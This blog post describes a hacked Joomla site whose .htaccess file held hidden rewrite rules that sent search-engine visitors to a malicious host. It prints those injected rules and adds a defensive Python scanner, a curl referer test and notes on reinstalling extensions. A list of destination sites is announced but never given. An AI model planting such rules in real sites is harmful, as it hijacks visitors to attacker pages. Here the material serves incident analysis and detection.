Rinet IT had a problem where some of the images for the drop-down boxes on the front page were not loading. Using Firebug, an add-on for Firefox (my favourite browser), the image link looked fine, but Firebug did not show the image in the small preview box the way it normally does; very puzzling.
Next I used Firebug's Net panel to watch the faulty images load. Instead of "200 OK", the requests came back with "301 Moved Permanently": not an error as such, but a redirect that was sending the image requests somewhere else.
A quick Google search turned up .htaccess hacks, so I had a look at my .htaccess. At first it appeared OK, but there were lots of empty lines at the start. Scrolling to the right revealed the malicious code shown below.
The result is that the .htaccess file had been modified. At the top, hidden by the blank lines and leading spaces, was:

    RewriteEngine On
    RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|alaarchiv|infospace).(.*)
    RewriteRule ^(.*)$ http://gdrivedownuntil .pro/creation?8 [R=301,L]
    RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-land|browseireland|finditireland|iesearch|ireland-ikz|clush|ehow|findhow|icq|goo|westaustraliaonline).(.*)
    RewriteRule ^(.*)$ http://gdrivedownuntil .pro/creation?8 [R=301,L]

Because each condition is a substring match (`^.*(...)`), short fragments such as `web` and `goo` fire on far more referers than the named search engines, and only visitors arriving with a matching Referer are redirected, so the site looks normal when you browse to it directly.
... and after the legitimate rules was ...

    ErrorDocument 500 http://gdrivedownuntil. pro/creation?8
In addition the hackers set the .htaccess permissions to 0444, removing the write privilege for the file owner; just a small frustration, since the owner can chmod it back. These guys are really annoying.
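Because the injected rules only fire on certain referers and the file was padded to push them out of view, the reliable check is to read the raw file rather than trust what the browser shows. The scanner below is an added example written for this post, not code from the original article or from Joomla: it reads a .htaccess file and flags a run of blank lines at the top, directives hidden behind long runs of leading spaces, RewriteRules that send visitors off-site (noting when a preceding RewriteCond keys on a search-engine referer), an ErrorDocument pointing at an external URL, and an owner-write bit that has been cleared as in the 0444 case above. The sample file, the host redirect.example and the own_hosts value are constructed for the example; the engine-name list adds a few engines beyond the ones in the injected rule.

```python
import os
import re
import shutil
import stat
import tempfile
from urllib.parse import urlparse

# Referer fragments the injected RewriteCond keyed on, drawn from the rules in
# the post plus a few more engines (an assumption for the example).
ENGINE_FRAGMENTS = ("google", "ask", "yahoo", "baidu", "bing", "yandex", "youtube", "wikipedia")
ABSOLUTE_URL = re.compile(r"^https?://", re.IGNORECASE)


def target_host(url):
    return (urlparse(url).hostname or "").lower()


def scan_htaccess(path, own_hosts=()):
    """Return a list of human-readable findings for one .htaccess file."""
    own_hosts = {h.lower() for h in own_hosts}
    findings = []

    # The attackers cleared the owner write bit (0444); report that first.
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if not mode & stat.S_IWUSR:
        findings.append(f"mode {mode:04o}: owner write bit cleared")

    with open(path, encoding="utf-8", errors="replace") as fh:
        lines = fh.read().split("\n")

    # A block of empty lines at the top pushes the real content below the fold.
    leading_blank = 0
    for line in lines:
        if line.strip():
            break
        leading_blank += 1
    if leading_blank >= 10:
        findings.append(f"{leading_blank} blank lines before the first directive")

    referer_gated = False  # a preceding RewriteCond matched a search-engine referer
    for no, line in enumerate(lines, 1):
        body = line.strip()
        if not body or body.startswith("#"):
            continue
        indent = len(line) - len(line.lstrip())
        if indent >= 40:  # directive only visible after scrolling far to the right
            findings.append(f"line {no}: directive hidden behind {indent} leading spaces")
        tokens = body.split()
        directive = tokens[0].lower()
        if directive == "rewritecond":
            if len(tokens) >= 3 and tokens[1].upper() == "%{HTTP_REFERER}":
                if any(frag in tokens[2].lower() for frag in ENGINE_FRAGMENTS):
                    referer_gated = True
                    findings.append(f"line {no}: RewriteCond keyed on search-engine referer")
            continue  # conditions accumulate until the next RewriteRule
        if directive == "rewriterule":
            if len(tokens) >= 3 and ABSOLUTE_URL.match(tokens[2]) and target_host(tokens[2]) not in own_hosts:
                gate = " (only for search-engine visitors)" if referer_gated else ""
                findings.append(f"line {no}: RewriteRule redirects off-site to {tokens[2]}{gate}")
            referer_gated = False
            continue
        if directive == "errordocument":
            if len(tokens) >= 3 and ABSOLUTE_URL.match(tokens[2]) and target_host(tokens[2]) not in own_hosts:
                findings.append(f"line {no}: ErrorDocument {tokens[1]} sends errors off-site to {tokens[2]}")
        referer_gated = False
    return findings


# Constructed sample laid out like the infected file in the post: a block of
# empty lines, the injected rules pushed far right by spaces, then the
# legitimate Joomla rules with the tampered ErrorDocument after them.
# The redirect host is a placeholder, not the one from the incident.
PAD = " " * 120
SAMPLE_HTACCESS = "\n" * 30 + "\n".join([
    PAD + "RewriteEngine On",
    PAD + "RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia).(.*)",
    PAD + "RewriteRule ^(.*)$ http://redirect.example/creation?8 [R=301,L]",
    "",
    "# legitimate Joomla rewrite rules",
    "RewriteEngine On",
    "RewriteCond %{REQUEST_FILENAME} !-f",
    "RewriteCond %{REQUEST_FILENAME} !-d",
    "RewriteRule .* index.php [L]",
    "ErrorDocument 500 http://redirect.example/creation?8",
    "",
])


def demo(content=SAMPLE_HTACCESS, mode=0o444):
    """Write the sample to a temp dir with the attacker's 0444 mode and scan it."""
    workdir = tempfile.mkdtemp()
    path = os.path.join(workdir, ".htaccess")
    try:
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
        os.chmod(path, mode)
        return scan_htaccess(path, own_hosts=("www.example.com",))
    finally:
        if os.path.exists(path):
            os.chmod(path, 0o644)
        shutil.rmtree(workdir)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Run it against the site's real .htaccess and pass your own domain in own_hosts so legitimate absolute redirects are not reported. To reproduce the referer-gated redirect from outside, request an image twice with curl, once with `-e 'https://www.google.com/'` (curl's referer option) and once without: an infected file answers the first with 301 and the second with 200.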
The destination sites were all dead, but whois showed them registered to legitimate-looking owners.
The destinations changed every time and included:
First I spent hours trying to find the rogue file behind the infection; it was a waste of time.
A restore from an Akeeba backup didn't help either; the rogue file must have been backed up along with everything else.
In the end I followed the advice from the Joomla Security Page 7 and rebuilt the site from a fresh install.
The database is left intact; however, some extensions reinstalled better than others.
Extension/Plugin | Uninstall First? | Action |
Akeeba Backup | No | Reinstalling over an existing one should be OK. I removed it first, and the new installation does not see the older backups; they still exist in the folder. |
CK Forms | No | Removing this deleted the database tables for ckforms, and redoing the form is quite a pain. It would be worthwhile leaving it and trying to reinstall over the top of the existing installation. For my recovery I had to copy the data from the /installation/sql SQL files to the new database using phpMyAdmin. |
JCE | Yes | As for CK Forms, although redoing the setup does not take long. |
jQuery++ (from tusher.org) | Yes | Reinstall fresh. The plugin codes in the articles are not removed on uninstall. |
FAQ Slider (0.9RC5.1) | Yes | Reinstall fresh. The plugin codes in the articles were not affected. |
Thickbox+ v1.3.1 | Yes | Reinstall fresh. The plugin codes in the articles were not affected. |
JCrawler | Yes | Not reinstalled yet. |